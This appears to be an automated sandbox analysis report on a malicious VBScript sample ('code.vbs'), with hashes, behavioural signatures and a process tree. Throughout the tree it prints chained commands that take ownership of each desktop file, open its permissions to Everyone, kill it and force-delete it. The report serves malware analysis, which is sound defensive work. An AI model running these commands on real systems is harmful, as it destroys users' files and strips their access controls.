Analysis
-
max time kernel
13s -
max time network
0s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
19/07/2024, 11:13
General
-
Target
code.vbs
-
Size
1KB
-
MD5
a2082fe1eb8d73d603bddf802bc17ff9
-
SHA1
6ce195e76015e5c78fe54137f0a4653d01c306ed
-
SHA256
5106c187dcecd355f43361aa67d7e52ee3b3536973e07af11e3ad8e71251cb94
-
SHA512
3b83ba3ea1498c4417f07621f0be0c140a767aad6a55dc9d4088e0902832a7d5799ae44af00f2283ee8b84567497bc50f8621f60ecdace926f4c0f0ebf48edd4
Score
8/10
Malware Config
Signatures
-
Possible privilege escalation attempt 58 IoCs
-
Modifies file permissions 1 TTPs 58 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 29 IoCs
-
Suspicious use of AdjustPrivilegeToken 28 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\CompressRepair.wm && icacls C:\Users\Admin\Desktop\CompressRepair.wm /grant Everyone:(F) && taskkill /f /im CompressRepair.wm && del/s/q C:\Users\Admin\Desktop\CompressRepair.wm2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\CompressRepair.wm3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\CompressRepair.wm /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im CompressRepair.wm3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\desktop.ini && icacls C:\Users\Admin\Desktop\desktop.ini /grant Everyone:(F) && taskkill /f /im desktop.ini && del/s/q C:\Users\Admin\Desktop\desktop.ini2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\desktop.ini3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\desktop.ini /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im desktop.ini3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\EnterAssert.ps1xml && icacls C:\Users\Admin\Desktop\EnterAssert.ps1xml /grant Everyone:(F) && taskkill /f /im EnterAssert.ps1xml && del/s/q C:\Users\Admin\Desktop\EnterAssert.ps1xml2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\EnterAssert.ps1xml3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\EnterAssert.ps1xml /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im EnterAssert.ps1xml3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\GetSwitch.reg && icacls C:\Users\Admin\Desktop\GetSwitch.reg /grant Everyone:(F) && taskkill /f /im GetSwitch.reg && del/s/q C:\Users\Admin\Desktop\GetSwitch.reg2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\GetSwitch.reg3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\GetSwitch.reg /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im GetSwitch.reg3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\GrantTrace.cr2 && icacls C:\Users\Admin\Desktop\GrantTrace.cr2 /grant Everyone:(F) && taskkill /f /im GrantTrace.cr2 && del/s/q C:\Users\Admin\Desktop\GrantTrace.cr22⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\GrantTrace.cr23⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\GrantTrace.cr2 /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im GrantTrace.cr23⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\LimitCopy.hta && icacls C:\Users\Admin\Desktop\LimitCopy.hta /grant Everyone:(F) && taskkill /f /im LimitCopy.hta && del/s/q C:\Users\Admin\Desktop\LimitCopy.hta2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\LimitCopy.hta3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\LimitCopy.hta /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im LimitCopy.hta3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\MountGrant.dib && icacls C:\Users\Admin\Desktop\MountGrant.dib /grant Everyone:(F) && taskkill /f /im MountGrant.dib && del/s/q C:\Users\Admin\Desktop\MountGrant.dib2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\MountGrant.dib3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\MountGrant.dib /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im MountGrant.dib3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\OutBackup.wma && icacls C:\Users\Admin\Desktop\OutBackup.wma /grant Everyone:(F) && taskkill /f /im OutBackup.wma && del/s/q C:\Users\Admin\Desktop\OutBackup.wma2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\OutBackup.wma3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\OutBackup.wma /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im OutBackup.wma3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\OutInvoke.wps && icacls C:\Users\Admin\Desktop\OutInvoke.wps /grant Everyone:(F) && taskkill /f /im OutInvoke.wps && del/s/q C:\Users\Admin\Desktop\OutInvoke.wps2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\OutInvoke.wps3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\OutInvoke.wps /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im OutInvoke.wps3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\OutShow.M2T && icacls C:\Users\Admin\Desktop\OutShow.M2T /grant Everyone:(F) && taskkill /f /im OutShow.M2T && del/s/q C:\Users\Admin\Desktop\OutShow.M2T2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\OutShow.M2T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\OutShow.M2T /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im OutShow.M2T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\ProtectAdd.avi && icacls C:\Users\Admin\Desktop\ProtectAdd.avi /grant Everyone:(F) && taskkill /f /im ProtectAdd.avi && del/s/q C:\Users\Admin\Desktop\ProtectAdd.avi2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\ProtectAdd.avi3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\ProtectAdd.avi /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProtectAdd.avi3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\PushResolve.vbe && icacls C:\Users\Admin\Desktop\PushResolve.vbe /grant Everyone:(F) && taskkill /f /im PushResolve.vbe && del/s/q C:\Users\Admin\Desktop\PushResolve.vbe2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\PushResolve.vbe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\PushResolve.vbe /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im PushResolve.vbe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\RenameHide.htm && icacls C:\Users\Admin\Desktop\RenameHide.htm /grant Everyone:(F) && taskkill /f /im RenameHide.htm && del/s/q C:\Users\Admin\Desktop\RenameHide.htm2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\RenameHide.htm3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\RenameHide.htm /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im RenameHide.htm3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\RequestConnect.mht && icacls C:\Users\Admin\Desktop\RequestConnect.mht /grant Everyone:(F) && taskkill /f /im RequestConnect.mht && del/s/q C:\Users\Admin\Desktop\RequestConnect.mht2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\RequestConnect.mht3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\RequestConnect.mht /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im RequestConnect.mht3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\RequestSplit.mov && icacls C:\Users\Admin\Desktop\RequestSplit.mov /grant Everyone:(F) && taskkill /f /im RequestSplit.mov && del/s/q C:\Users\Admin\Desktop\RequestSplit.mov2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\RequestSplit.mov3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\RequestSplit.mov /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im RequestSplit.mov3⤵
- Kills process with taskkill
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\ResolveConvert.tiff && icacls C:\Users\Admin\Desktop\ResolveConvert.tiff /grant Everyone:(F) && taskkill /f /im ResolveConvert.tiff && del/s/q C:\Users\Admin\Desktop\ResolveConvert.tiff2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\ResolveConvert.tiff3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\ResolveConvert.tiff /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im ResolveConvert.tiff3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\ResolveSelect.cab && icacls C:\Users\Admin\Desktop\ResolveSelect.cab /grant Everyone:(F) && taskkill /f /im ResolveSelect.cab && del/s/q C:\Users\Admin\Desktop\ResolveSelect.cab2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\ResolveSelect.cab3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\ResolveSelect.cab /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im ResolveSelect.cab3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\RevokePop.TTS && icacls C:\Users\Admin\Desktop\RevokePop.TTS /grant Everyone:(F) && taskkill /f /im RevokePop.TTS && del/s/q C:\Users\Admin\Desktop\RevokePop.TTS2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\RevokePop.TTS3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\RevokePop.TTS /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im RevokePop.TTS3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\ShowStart.xht && icacls C:\Users\Admin\Desktop\ShowStart.xht /grant Everyone:(F) && taskkill /f /im ShowStart.xht && del/s/q C:\Users\Admin\Desktop\ShowStart.xht2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\ShowStart.xht3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\ShowStart.xht /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im ShowStart.xht3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\StartCheckpoint.odt && icacls C:\Users\Admin\Desktop\StartCheckpoint.odt /grant Everyone:(F) && taskkill /f /im StartCheckpoint.odt && del/s/q C:\Users\Admin\Desktop\StartCheckpoint.odt2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\StartCheckpoint.odt3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\StartCheckpoint.odt /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im StartCheckpoint.odt3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\StopBlock.wpl && icacls C:\Users\Admin\Desktop\StopBlock.wpl /grant Everyone:(F) && taskkill /f /im StopBlock.wpl && del/s/q C:\Users\Admin\Desktop\StopBlock.wpl2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\StopBlock.wpl3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\StopBlock.wpl /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im StopBlock.wpl3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\SubmitConvert.docx && icacls C:\Users\Admin\Desktop\SubmitConvert.docx /grant Everyone:(F) && taskkill /f /im SubmitConvert.docx && del/s/q C:\Users\Admin\Desktop\SubmitConvert.docx2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\SubmitConvert.docx3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\SubmitConvert.docx /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im SubmitConvert.docx3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\SubmitStop.mpa && icacls C:\Users\Admin\Desktop\SubmitStop.mpa /grant Everyone:(F) && taskkill /f /im SubmitStop.mpa && del/s/q C:\Users\Admin\Desktop\SubmitStop.mpa2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\SubmitStop.mpa3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\SubmitStop.mpa /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im SubmitStop.mpa3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\TestCompress.vdx && icacls C:\Users\Admin\Desktop\TestCompress.vdx /grant Everyone:(F) && taskkill /f /im TestCompress.vdx && del/s/q C:\Users\Admin\Desktop\TestCompress.vdx2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\TestCompress.vdx3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\TestCompress.vdx /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im TestCompress.vdx3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\TestShow.bmp && icacls C:\Users\Admin\Desktop\TestShow.bmp /grant Everyone:(F) && taskkill /f /im TestShow.bmp && del/s/q C:\Users\Admin\Desktop\TestShow.bmp2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\TestShow.bmp3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\TestShow.bmp /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im TestShow.bmp3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\UnblockOut.xls && icacls C:\Users\Admin\Desktop\UnblockOut.xls /grant Everyone:(F) && taskkill /f /im UnblockOut.xls && del/s/q C:\Users\Admin\Desktop\UnblockOut.xls2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\UnblockOut.xls3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\UnblockOut.xls /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im UnblockOut.xls3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\UnprotectConvert.wmf && icacls C:\Users\Admin\Desktop\UnprotectConvert.wmf /grant Everyone:(F) && taskkill /f /im UnprotectConvert.wmf && del/s/q C:\Users\Admin\Desktop\UnprotectConvert.wmf2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\UnprotectConvert.wmf3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\UnprotectConvert.wmf /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im UnprotectConvert.wmf3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\WaitDebug.ppt && icacls C:\Users\Admin\Desktop\WaitDebug.ppt /grant Everyone:(F) && taskkill /f /im WaitDebug.ppt && del/s/q C:\Users\Admin\Desktop\WaitDebug.ppt2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\WaitDebug.ppt3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\WaitDebug.ppt /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im WaitDebug.ppt3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\Desktop\WatchRegister.M2T && icacls C:\Users\Admin\Desktop\WatchRegister.M2T /grant Everyone:(F) && taskkill /f /im WatchRegister.M2T && del/s/q C:\Users\Admin\Desktop\WatchRegister.M2T2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\Desktop\WatchRegister.M2T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\Desktop\WatchRegister.M2T /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im WatchRegister.M2T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2039216216-587301509-1286133936-627356118904496652104817838-16072290181917332687"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-101806944-3894709-473655633434592565-1631256447-1994087519588634695-71623685"1⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roamings.vbs"1⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\tase.vbs"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wininit2⤵
-
C:\Windows\system32\wininit.exe"C:\Windows\system32\wininit.exe"3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
673B
MD574cdf83332a4c9b61a520d43bd7ac2b2
SHA1df4ac12285fa2822f6d62622e0d6c338da9c870f
SHA256ecbf84d2c903b304fa9b530f9f1e74335d9fde6f2db5a64bc399d8749d92863c
SHA5126a1db72f0913241f711a7573d7bb84f87f4fc45f9c62c05160f30038c860931e73dda7306abb49f6e05faeded6f2c4c013b6264a8d8f5d04afeab8464217921a
-
Filesize
1KB
MD51a2f21d594f1e59cfb143b854da88c77
SHA14276cdedf6443e4017692398af351e0e4623040c
SHA25678c04f1599fc5244cd2676d109b43f61f38a2617ae64751e8825f132b2cad99b
SHA5124888a707a68115e63529278f04989d988888dbcde09780a280d16c2e96a1cfc36763535e027bede0dd22455e55c673551d63ea3958d94cccb9ab1c866568d80b
-
Filesize
2.9MB
-
Filesize
32KB